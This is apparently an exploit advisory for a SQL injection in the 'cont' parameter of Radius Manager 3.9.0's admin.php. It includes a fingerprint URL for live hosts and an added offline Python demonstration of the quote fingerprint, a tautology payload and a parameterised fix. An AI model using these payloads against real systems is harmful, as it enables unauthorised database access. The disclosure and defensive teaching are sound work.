# Exploit Title: Radius Manager V3.9.0 SQL Injection
# Date: 16-10-2011
# Author: Mehdi Boukazoula
# Software Link: http://www.dmasoftlab.com
# Version: v 3.9.0
# Tested on: v 3.9.0 with PostgreSQL, PHP 5.2.6, Apache 2.2.8
# Description: In the page "http://127.0.0.1/admin.php" the parameter "cont" is not sanitized before it reaches the SQL query, which lets a malicious user communicate with the database server directly.
--------------------------------------------------------------------------------------------------------
# Code of exploit: in the browser (FingerPrint PoC)
URL : http://HOST/admin.php?cont=cont=search_invoices'YOUR SQL QUERY
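The fingerprint above works because an unmatched single quote breaks the statement the application builds around "cont". The following is an added example, not code from the advisory or from DMA Softlab: it models a "cont" lookup that concatenates the parameter into SQL (the flaw described), runs the quote-based fingerprint and a boolean payload against it, and shows the parameterised form that closes the hole. An in-memory SQLite database stands in for PostgreSQL, and the "pages" table and its columns are invented for illustration.

```python
"""Added example (not part of the advisory): unsanitised "cont" parameter
concatenated into SQL, the single-quote fingerprint, and the parameterised fix.
SQLite is used here as an offline stand-in for PostgreSQL; the table layout is
an assumption made for the demonstration."""
import sqlite3


def make_db():
    # Constructed sample data: a page-name -> page-body table.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE pages (name TEXT, body TEXT)")
    con.executemany(
        "INSERT INTO pages VALUES (?, ?)",
        [("search_invoices", "invoice search form"),
         ("dashboard", "admin dashboard")],
    )
    return con


def lookup_vulnerable(con, cont):
    # The flaw the advisory describes: the request parameter is pasted
    # straight into the statement, so a quote in it changes the SQL.
    sql = "SELECT body FROM pages WHERE name = '" + cont + "'"
    return [row[0] for row in con.execute(sql)]


def lookup_fixed(con, cont):
    # Parameterised query: the value is bound by the driver and can never
    # alter the statement, whatever characters it contains.
    rows = con.execute("SELECT body FROM pages WHERE name = ?", (cont,))
    return [row[0] for row in rows]


def fingerprint(lookup, con):
    """Quote fingerprint from the advisory, made into a check.

    A bare trailing quote (search_invoices') should cause a database error on
    a vulnerable path, while a doubled quote (search_invoices'') is a valid
    SQL escape and should be accepted. Both happening together is the
    injection signature; a fixed path errors on neither."""
    try:
        lookup(con, "search_invoices'")
        single_quote_broke = False
    except sqlite3.OperationalError:
        single_quote_broke = True
    try:
        lookup(con, "search_invoices''")
        doubled_quote_ok = True
    except sqlite3.OperationalError:
        doubled_quote_ok = False
    return single_quote_broke and doubled_quote_ok


def boolean_payload():
    # Tautology payload: on the vulnerable path it widens the WHERE clause
    # to every row, on the fixed path it is just a page name that does not exist.
    return "search_invoices' OR '1'='1"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable fingerprint:", fingerprint(lookup_vulnerable, db))
    print("fixed fingerprint:     ", fingerprint(lookup_fixed, db))
    print("vulnerable rows:", lookup_vulnerable(db, boolean_payload()))
    print("fixed rows:     ", lookup_fixed(db, boolean_payload()))
```

Against the live target the signals are a database error message or a changed page body rather than a Python exception, but the logic is the same: a lone quote that breaks the page and a doubled quote that does not is the quickest confirmation that "cont" reaches the query unescaped.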